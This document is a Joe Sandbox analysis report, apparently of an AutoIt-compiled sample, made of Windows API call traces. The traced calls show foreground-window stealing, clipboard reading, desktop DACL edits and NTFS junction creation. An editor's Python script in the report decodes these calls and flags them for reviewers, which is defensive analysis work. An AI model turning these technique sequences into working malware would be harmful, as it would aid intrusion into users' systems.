                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007FCEB7
                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007FCECA
                                                • SetCapture.USER32(?), ref: 007FCED3
                                                • ClientToScreen.USER32(?,?), ref: 007FCF38
                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007FCF45
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007FCF5F
                                                • ReleaseCapture.USER32 ref: 007FCF6A
                                                • GetCursorPos.USER32(?), ref: 007FCFA4
                                                • ScreenToClient.USER32(?,?), ref: 007FCFB1
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 007FD00D
                                                • SendMessageW.USER32 ref: 007FD03B
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 007FD078
                                                • SendMessageW.USER32 ref: 007FD0A7
                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007FD0C8
                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007FD0D7
                                                • GetCursorPos.USER32(?), ref: 007FD0F7
                                                • ScreenToClient.USER32(?,?), ref: 007FD104
                                                • GetParent.USER32(?), ref: 007FD124
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 007FD18D
                                                • SendMessageW.USER32 ref: 007FD1BE
                                                • ClientToScreen.USER32(?,?), ref: 007FD21C
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007FD24C
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 007FD276
                                                • SendMessageW.USER32 ref: 007FD299
                                                • ClientToScreen.USER32(?,?), ref: 007FD2EB
                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007FD31F
                                                  • Part of subcall function 007725DB: GetWindowLongW.USER32(?,000000EB), ref: 007725EC
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007FD3BB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                • String ID: @GUI_DRAGID$F
                                                • API String ID: 3977979337-4164748364
                                                • Opcode ID: 652b068d63b40d37abe8c82a596e15209bb1483b3986007b5201ae91e6a66e6d
                                                • Instruction ID: 15b90cb2d32bfea86e44f643c03c7ec0b756fbfc9498e1974d1b336d99d664c8
                                                • Opcode Fuzzy Hash: 652b068d63b40d37abe8c82a596e15209bb1483b3986007b5201ae91e6a66e6d
                                                • Instruction Fuzzy Hash: FB42BC74204209EFDB22CF24C948ABABBE5FF49310F144969F655D73A1CB3AD854CB92
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove$_memset
                                                • String ID: DEFINE$Oax$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                • API String ID: 1357608183-3856524260
                                                • Opcode ID: 6289f890ddaa61052faa27b37d54f22f6f0d78432c660b40f291395b453511b4
                                                • Instruction ID: 275ef372e708f029275159a1532bd8a48382300db9a45df57da695f89a0af096
                                                • Opcode Fuzzy Hash: 6289f890ddaa61052faa27b37d54f22f6f0d78432c660b40f291395b453511b4
                                                • Instruction Fuzzy Hash: D593B471A40219DFDB28DF58D881BADB7B1FF48710F24816EE945EB281E7789E81CB50
                                                APIs
                                                • GetForegroundWindow.USER32(00000000,?), ref: 00774A3D
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007AD9BE
                                                • IsIconic.USER32(?), ref: 007AD9C7
                                                • ShowWindow.USER32(?,00000009), ref: 007AD9D4
                                                • SetForegroundWindow.USER32(?), ref: 007AD9DE
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007AD9F4
                                                • GetCurrentThreadId.KERNEL32 ref: 007AD9FB
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 007ADA07
                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 007ADA18
                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 007ADA20
                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 007ADA28
                                                • SetForegroundWindow.USER32(?), ref: 007ADA2B
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 007ADA40
                                                • keybd_event.USER32(00000012,00000000), ref: 007ADA4B
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 007ADA55
                                                • keybd_event.USER32(00000012,00000000), ref: 007ADA5A
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 007ADA63
                                                • keybd_event.USER32(00000012,00000000), ref: 007ADA68
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 007ADA72
                                                • keybd_event.USER32(00000012,00000000), ref: 007ADA77
                                                • SetForegroundWindow.USER32(?), ref: 007ADA7A
                                                • AttachThreadInput.USER32(?,?,00000000), ref: 007ADAA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 4125248594-2988720461
                                                • Opcode ID: c9a38f642eb8a302132ab8afb75d8cc842c543f085e0b5199f5acd065ee461ec
                                                • Instruction ID: 7f78e0d878c6931af9dbc1050af3f31230bfa815d56e392bb4e0a25fa3a3b6a6
                                                • Opcode Fuzzy Hash: c9a38f642eb8a302132ab8afb75d8cc842c543f085e0b5199f5acd065ee461ec
                                                • Instruction Fuzzy Hash: 8D315271A40318BAEB306F619C49F7F7F6CEF85B50F108025FA05EA1D0CAB45D11EAA5
                                                APIs
                                                  • Part of subcall function 007C8AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C8AED
                                                  • Part of subcall function 007C8AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C8B1A
                                                  • Part of subcall function 007C8AA3: GetLastError.KERNEL32 ref: 007C8B27
                                                • _memset.LIBCMT ref: 007C867B
                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007C86CD
                                                • CloseHandle.KERNEL32(?), ref: 007C86DE
                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007C86F5
                                                • GetProcessWindowStation.USER32 ref: 007C870E
                                                • SetProcessWindowStation.USER32(00000000), ref: 007C8718
                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007C8732
                                                  • Part of subcall function 007C84F3: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007C8631), ref: 007C8508
                                                  • Part of subcall function 007C84F3: CloseHandle.KERNEL32(?,?,007C8631), ref: 007C851A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                • String ID: $default$winsta0
                                                • API String ID: 2063423040-1027155976
                                                • Opcode ID: af99ed2467575c33275e7f7e5cdde80bcd16eb8742beb3d60799aeebcc6d30aa
                                                • Instruction ID: 3d79076110e901b193f6433662df9a0595085cfcbbb5044f779045813ae3235d
                                                • Opcode Fuzzy Hash: af99ed2467575c33275e7f7e5cdde80bcd16eb8742beb3d60799aeebcc6d30aa
                                                • Instruction Fuzzy Hash: D0817771810209AFDF519FA4DC49EEEBBB8EF04304F44816DF914A6261DF398E14DB62
                                                APIs
                                                • OpenClipboard.USER32(007FF910), ref: 007E40A6
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 007E40B4
                                                • GetClipboardData.USER32(0000000D), ref: 007E40BC
                                                • CloseClipboard.USER32 ref: 007E40C8
                                                • GlobalLock.KERNEL32(00000000), ref: 007E40E4
                                                • CloseClipboard.USER32 ref: 007E40EE
                                                • GlobalUnlock.KERNEL32(00000000), ref: 007E4103
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 007E4110
                                                • GetClipboardData.USER32(00000001), ref: 007E4118
                                                • GlobalLock.KERNEL32(00000000), ref: 007E4125
                                                • GlobalUnlock.KERNEL32(00000000), ref: 007E4159
                                                • CloseClipboard.USER32 ref: 007E4269
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                • String ID:
                                                • API String ID: 3222323430-0
                                                • Opcode ID: 8479e9782c135c6e51d769f8b5aaf3623a9f5a3f0c96005f4f504e7e03fac2ca
                                                • Instruction ID: c6f4b1d3a4464ed56b2af925c7f77315808fddd08c36143f9660fe201329fd0a
                                                • Opcode Fuzzy Hash: 8479e9782c135c6e51d769f8b5aaf3623a9f5a3f0c96005f4f504e7e03fac2ca
                                                • Instruction Fuzzy Hash: 9D51BE35204346ABD710EF21DC89F7E77A8AF88B01F008529F64AD21A1DF78D904CB6A
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007DC819
                                                • FindClose.KERNEL32(00000000), ref: 007DC86D
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007DC892
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007DC8A9
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 007DC8D0
                                                • __swprintf.LIBCMT ref: 007DC91C
                                                • __swprintf.LIBCMT ref: 007DC95F
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                • __swprintf.LIBCMT ref: 007DC9B3
                                                  • Part of subcall function 00793818: __woutput_l.LIBCMT ref: 00793871
                                                • __swprintf.LIBCMT ref: 007DCA01
                                                  • Part of subcall function 00793818: __flsbuf.LIBCMT ref: 00793893
                                                  • Part of subcall function 00793818: __flsbuf.LIBCMT ref: 007938AB
                                                • __swprintf.LIBCMT ref: 007DCA50
                                                • __swprintf.LIBCMT ref: 007DCA9F
                                                • __swprintf.LIBCMT ref: 007DCAEE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                • API String ID: 3953360268-2428617273
                                                • Opcode ID: f18b23994459acb75ff674bf408796b3789cf61e9b30dd9f433bafee12d8af76
                                                • Instruction ID: 945731f9f67abb440869da5d1bd16ed35c063dd737d7329f6b6d90b1f4008e58
                                                • Opcode Fuzzy Hash: f18b23994459acb75ff674bf408796b3789cf61e9b30dd9f433bafee12d8af76
                                                • Instruction Fuzzy Hash: E9A144B1405305EBCB04EB54C98ADAFB7ECFF94744F408929F595D2191EB38DA09C762
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007DF042
                                                • _wcscmp.LIBCMT ref: 007DF057
                                                • _wcscmp.LIBCMT ref: 007DF06E
                                                • GetFileAttributesW.KERNEL32(?), ref: 007DF080
                                                • SetFileAttributesW.KERNEL32(?,?), ref: 007DF09A
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 007DF0B2
                                                • FindClose.KERNEL32(00000000), ref: 007DF0BD
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 007DF0D9
                                                • _wcscmp.LIBCMT ref: 007DF100
                                                • _wcscmp.LIBCMT ref: 007DF117
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DF129
                                                • SetCurrentDirectoryW.KERNEL32(00828920), ref: 007DF147
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 007DF151
                                                • FindClose.KERNEL32(00000000), ref: 007DF15E
                                                • FindClose.KERNEL32(00000000), ref: 007DF170
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                • String ID: *.*
                                                • API String ID: 1803514871-438819550
                                                • Opcode ID: 3e714a75ae6e4f62d46ea6ef6c76e64887d417b8e2c3905c2fd23aee5279d739
                                                • Instruction ID: 99690589973471b3005642189a493d6ebeb58c523150bf2e09968274b14ee045
                                                • Opcode Fuzzy Hash: 3e714a75ae6e4f62d46ea6ef6c76e64887d417b8e2c3905c2fd23aee5279d739
                                                • Instruction Fuzzy Hash: 7B31C57250121DAADF10EBB4EC49BEE77BCAF04320F104176E915D32A0DB39DA85CA68
                                                APIs
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F09DE
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,007FF910,00000000,?,00000000,?,?), ref: 007F0A4C
                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007F0A94
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007F0B1D
                                                • RegCloseKey.ADVAPI32(?), ref: 007F0E3D
                                                • RegCloseKey.ADVAPI32(00000000), ref: 007F0E4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Close$ConnectCreateRegistryValue
                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                • API String ID: 536824911-966354055
                                                • Opcode ID: 19f965f88890e94bd7450f47c422ca2cd035cac3c39eaed3db38791b081d0f4e
                                                • Instruction ID: 96d2930853f64182d34e403584f2e633b4bd4d3ea7e935e14853ec15d88613e3
                                                • Opcode Fuzzy Hash: 19f965f88890e94bd7450f47c422ca2cd035cac3c39eaed3db38791b081d0f4e
                                                • Instruction Fuzzy Hash: DA023A75204611DFDB14EF24C855A2AB7E5FF88724F04885DFA9A9B362DB38ED01CB81
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007DF19F
                                                • _wcscmp.LIBCMT ref: 007DF1B4
                                                • _wcscmp.LIBCMT ref: 007DF1CB
                                                  • Part of subcall function 007D43C6: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007D43E1
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 007DF1FA
                                                • FindClose.KERNEL32(00000000), ref: 007DF205
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 007DF221
                                                • _wcscmp.LIBCMT ref: 007DF248
                                                • _wcscmp.LIBCMT ref: 007DF25F
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DF271
                                                • SetCurrentDirectoryW.KERNEL32(00828920), ref: 007DF28F
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 007DF299
                                                • FindClose.KERNEL32(00000000), ref: 007DF2A6
                                                • FindClose.KERNEL32(00000000), ref: 007DF2B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                • String ID: *.*
                                                • API String ID: 1824444939-438819550
                                                • Opcode ID: 9a0b0ea22f45762c01595e46e75476bc1f54d6daf9168b1b7213c6470c3a516b
                                                • Instruction ID: 3a6c54e773f10f8e8415e52be7aef1868dec68919047db37caeee39668f19446
                                                • Opcode Fuzzy Hash: 9a0b0ea22f45762c01595e46e75476bc1f54d6daf9168b1b7213c6470c3a516b
                                                • Instruction Fuzzy Hash: D831E776501619BACF109BA4EC49AEE77BCBF05320F104176E915E33A0DB39EE85CA58
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007DA299
                                                • __swprintf.LIBCMT ref: 007DA2BB
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 007DA2F8
                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007DA31D
                                                • _memset.LIBCMT ref: 007DA33C
                                                • _wcsncpy.LIBCMT ref: 007DA378
                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007DA3AD
                                                • CloseHandle.KERNEL32(00000000), ref: 007DA3B8
                                                • RemoveDirectoryW.KERNEL32(?), ref: 007DA3C1
                                                • CloseHandle.KERNEL32(00000000), ref: 007DA3CB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                • String ID: :$\$\??\%s
                                                • API String ID: 2733774712-3457252023
                                                • Opcode ID: 49a537ea511be1d619fb4fada582bb2a64fa228e4458780e81a5d013dca79b4d
                                                • Instruction ID: daff96aa19be97595d18f0b010a1349689b3102070247a2f23e163d632800b66
                                                • Opcode Fuzzy Hash: 49a537ea511be1d619fb4fada582bb2a64fa228e4458780e81a5d013dca79b4d
                                                • Instruction Fuzzy Hash: 4B31807650010ABBDB209FA0DC49FAB77BDFF88740F5441B6F908D6160EB789645CB25
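The API traces above list raw operands (virtual-key 00000012, clipboard format 0000000D, access masks 00060000 and 00060081, IOCTL 000900A4) without decoding them. The following Python is an added example by the editor, not output of Joe Sandbox and not code from the sample: it parses trace lines in the report's own "• Func.MODULE(args), ref: ADDR" form, decodes those operands with Windows SDK constants, and flags the call patterns seen in the window-activation, clipboard, window-station/desktop and reparse-point entries above. The sample trace is constructed from lines copied out of this section; the finding labels (foreground_steal and so on) and the rules behind them are the editor's interpretation, not report data.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: trace lines copied from this report's function entries
# (window activation, clipboard read, winsta/desktop open, reparse-point set).
SAMPLE_TRACE = """\
• GetCurrentThreadId.KERNEL32 ref: 007AD9FB
• AttachThreadInput.USER32(?,00000000,00000001), ref: 007ADA18
• keybd_event.USER32(00000012,00000000), ref: 007ADA4B
• SetForegroundWindow.USER32(?), ref: 007ADA7A
• GetClipboardData.USER32(0000000D), ref: 007E40BC
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007C86F5
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007C8732
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007DA31D
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007DA3AD
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<func>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# Windows SDK constants (winuser.h, winnt.h, winioctl.h), not taken from the report.
VK_NAMES = {0x12: "VK_MENU (Alt)"}
CF_NAMES = {0x01: "CF_TEXT", 0x0D: "CF_UNICODETEXT"}
FSCTL_NAMES = {0x000900A4: "FSCTL_SET_REPARSE_POINT", 0x000900A8: "FSCTL_GET_REPARSE_POINT"}
STANDARD_BITS = [(0x00020000, "READ_CONTROL"), (0x00040000, "WRITE_DAC"), (0x00080000, "WRITE_OWNER")]
DESKTOP_BITS = [(0x00000001, "DESKTOP_READOBJECTS"), (0x00000080, "DESKTOP_WRITEOBJECTS")] + STANDARD_BITS

@dataclass
class ApiCall:
    func: str
    module: str
    args: list                     # int for hex operands, None for '?', str for literals
    ref: int
    notes: list = field(default_factory=list)

def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"-?[0-9A-Fa-f]{8}", tok) else tok

def parse_trace(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            raw = m.group("args")
            args = [parse_arg(a) for a in raw.split(",")] if raw else []
            calls.append(ApiCall(m.group("func"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls

def decode_ioctl(code: int) -> dict:
    """Split a CTL_CODE() value: device type << 16 | access << 14 | function << 2 | method."""
    return {"device": code >> 16, "access": (code >> 14) & 3, "function": (code >> 2) & 0xFFF,
            "method": code & 3, "name": FSCTL_NAMES.get(code, "unknown")}

def decode_access(mask: int, table) -> list:
    return [name for bit, name in table if mask & bit]

def hex_arg(call, idx):
    # Argument idx if it was a hex operand (not '?' and not a string literal), else None.
    return call.args[idx] if len(call.args) > idx and isinstance(call.args[idx], int) else None

def annotate(calls) -> list:
    """Decode operands into call.notes; return the editor's technique labels that apply."""
    seen = {c.func for c in calls}
    alt_pressed = write_dac = reparse_set = clip_text = False
    for c in calls:
        if c.func == "keybd_event" and hex_arg(c, 0) in VK_NAMES:
            c.notes.append(VK_NAMES[c.args[0]])
            alt_pressed |= c.args[0] == 0x12
        elif c.func == "GetClipboardData" and hex_arg(c, 0) in CF_NAMES:
            c.notes.append(CF_NAMES[c.args[0]])
            clip_text = True
        elif c.func == "DeviceIoControl" and hex_arg(c, 1) is not None:
            info = decode_ioctl(c.args[1])
            c.notes.append(f"{info['name']} (device {info['device']}, function {info['function']})")
            reparse_set |= info["name"] == "FSCTL_SET_REPARSE_POINT"
        elif c.func in ("OpenDesktopW", "OpenWindowStationW"):
            idx, table = (3, DESKTOP_BITS) if c.func == "OpenDesktopW" else (2, STANDARD_BITS)
            if hex_arg(c, idx) is not None:
                c.notes.extend(decode_access(c.args[idx], table))
                write_dac |= "WRITE_DAC" in c.notes
    findings = []
    if alt_pressed and {"AttachThreadInput", "SetForegroundWindow"} <= seen:
        findings.append("foreground_steal")          # attach to foreground thread, fake Alt, then SetForegroundWindow
    if reparse_set:
        findings.append("reparse_point_set")         # FSCTL_SET_REPARSE_POINT: junction / symlink creation
    if write_dac:
        findings.append("winsta_desktop_write_dac")  # winsta0 / default desktop opened with WRITE_DAC
    if clip_text:
        findings.append("clipboard_text_read")
    return findings

def summarize(text: str):
    calls = parse_trace(text)
    return calls, annotate(calls)
```

Running summarize(SAMPLE_TRACE) yields all four labels. The decoding is what makes the trace readable: 000900A4 splits into device type 9 (FILE_DEVICE_FILE_SYSTEM), function 41, METHOD_BUFFERED, which is FSCTL_SET_REPARSE_POINT; combined with the preceding CreateDirectoryW, the CreateFileW flags 02200000 (FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT) and the "\??\%s" format string in that entry, it is the standard sequence for creating an NTFS junction. Likewise 00060081 on OpenDesktopW and 00060000 on OpenWindowStationW both carry WRITE_DAC, which matches the GetUserObjectSecurity/AddAce/SetUserObjectSecurity DACL edit in the entry that follows. Note that such sequences also occur in benign AutoIt-compiled programs, so the labels are leads for a reviewer, not verdicts.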
                                                APIs
                                                  • Part of subcall function 007C852A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C8546
                                                  • Part of subcall function 007C852A: GetLastError.KERNEL32(?,007C800A,?,?,?), ref: 007C8550
                                                  • Part of subcall function 007C852A: GetProcessHeap.KERNEL32(00000008,?,?,007C800A,?,?,?), ref: 007C855F
